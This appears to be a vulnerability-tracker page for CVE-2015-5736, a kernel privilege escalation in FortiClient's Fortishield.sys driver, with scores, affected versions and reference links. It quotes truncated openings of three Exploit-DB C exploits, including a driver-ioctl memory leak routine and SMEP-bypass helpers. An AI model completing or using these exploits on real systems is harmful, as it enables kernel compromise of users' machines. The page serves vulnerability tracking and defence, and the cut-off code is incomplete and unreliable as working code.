CVE-2015-5736
published 2015-09-03CVE-2015-5736: The Fortishield.sys driver in Fortinet FortiClient before 5.2.4 allows local users to execute arbitrary code with kernel privileges by setting the callback…
PriorityP342high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
2.03%
78.6th percentile
The Fortishield.sys driver in Fortinet FortiClient before 5.2.4 allows local users to execute arbitrary code with kernel privileges by setting the callback function in a (1) 0x220024 or (2) 0x220028 ioctl call.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | forticlient | <= 5.2.3 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation
exploitdb·2018-08-05
CVE-2015-5736 Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation
Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation
---
#include "stdafx.h"
#include
#include
#include
#include
#pragma comment (lib,"psapi")
PULONGLONG leak_buffer = (PULONGLONG)VirtualAlloc((LPVOID)0x000000001a000000, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
ULONGLONG leakQWORD(ULONGLONG addr, HANDLE driver)
{
memset((LPVOID)0x000000001a000000, 0x11, 0x1000);
memset((LPVOID)0x000000001a001000, 0x22, 0x1000);
leak_buffer[0] = 0x000000001a000008;
leak_buffer[1] = 0x0000000000000003;
leak_buffer[4] = 0x000000001a000028;
leak_buffer[6] = addr - 0x70;
DWORD IoControlCode = 0x22608C;
LPVOID InputBuffer = (LPVOID)0x000000001a000000;
DWORD InputBufferLength = 0x20;
LPVOID OutputBuffer = (LPVOID)0x000000001a001000;
DWORD OutputBufferLength = 0x110;
DWO
Exploit-DB
Fortinet FortiClient 5.2.3 (Windows 10 x64 Post-Anniversary) - Local Privilege Escalation
exploitdb·2017-03-25
CVE-2015-5736 Fortinet FortiClient 5.2.3 (Windows 10 x64 Post-Anniversary) - Local Privilege Escalation
Fortinet FortiClient 5.2.3 (Windows 10 x64 Post-Anniversary) - Local Privilege Escalation
---
/*
Check these out:
- https://www.coresecurity.com/system/files/publications/2016/05/Windows%20SMEP%20bypass%20U%3DS.pdf
- https://labs.mwrinfosecurity.com/blog/a-tale-of-bitmaps/
Tested on:
- Windows 10 Pro x64 (Post-Anniversary)
- ntoskrnl.exe: 10.0.14393.953
- FortiShield.sys: 5.2.3.633
Thanks to master @ryujin and @ronin for helping out. And thanks to Morten (@Blomster81) for the MiGetPteAddress :D
*/
#include
#include
#include
#include
#pragma comment (lib,"psapi")
#pragma comment(lib, "gdi32.lib")
#pragma comment(lib, "User32.lib")
#define object_number 0x02
#define accel_array_size 0x2b6
#define STATUS_SUCCESS 0x00000000
typedef void** PPVOID;
typedef struct _tagSERVERINFO {
UINT64 p
Exploit-DB
Fortinet FortiClient 5.2.3 (Windows 10 x64 Pre-Anniversary) - Local Privilege Escalation
exploitdb·2017-03-25
CVE-2015-5736 Fortinet FortiClient 5.2.3 (Windows 10 x64 Pre-Anniversary) - Local Privilege Escalation
Fortinet FortiClient 5.2.3 (Windows 10 x64 Pre-Anniversary) - Local Privilege Escalation
---
/*
Check this out:
- https://www.coresecurity.com/system/files/publications/2016/05/Windows%20SMEP%20bypass%20U%3DS.pdf
Tested on:
- Windows 10 Pro x64 (Pre-Anniversary)
- hal.dll: 10.0.10240.16384
- FortiShield.sys: 5.2.3.633
Thanks to master @ryujin and @ronin for helping out.
*/
#include
#include
#include
#include
#pragma comment (lib,"psapi")
ULONGLONG get_pxe_address_64(ULONGLONG address) {
ULONGLONG result = address >> 9;
result = result | 0xFFFFF68000000000;
result = result & 0xFFFFF6FFFFFFFFF8;
return result;
}
LPVOID GetBaseAddr(char *drvname) {
LPVOID drivers[1024];
DWORD cbNeeded;
int nDrivers, i = 0;
if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded test.t
No writeups or analysis indexed.
http://fortiguard.com/advisory/mulitple-vulnerabilities-in-forticlienthttp://packetstormsecurity.com/files/133398/FortiClient-Antivirus-Information-Exposure-Access-Control.htmlhttp://seclists.org/fulldisclosure/2015/Sep/0http://www.coresecurity.com/advisories/forticlient-antivirus-multiple-vulnerabilitieshttp://www.fortiguard.com/advisory/mulitple-vulnerabilities-in-forticlienthttp://www.securityfocus.com/archive/1/536369/100/0/threadedhttp://www.securitytracker.com/id/1033439https://www.exploit-db.com/exploits/41721/https://www.exploit-db.com/exploits/41722/https://www.exploit-db.com/exploits/45149/http://fortiguard.com/advisory/mulitple-vulnerabilities-in-forticlienthttp://packetstormsecurity.com/files/133398/FortiClient-Antivirus-Information-Exposure-Access-Control.htmlhttp://seclists.org/fulldisclosure/2015/Sep/0http://www.coresecurity.com/advisories/forticlient-antivirus-multiple-vulnerabilitieshttp://www.fortiguard.com/advisory/mulitple-vulnerabilities-in-forticlienthttp://www.securityfocus.com/archive/1/536369/100/0/threadedhttp://www.securitytracker.com/id/1033439https://www.exploit-db.com/exploits/41721/https://www.exploit-db.com/exploits/41722/https://www.exploit-db.com/exploits/45149/
2015-09-03
Published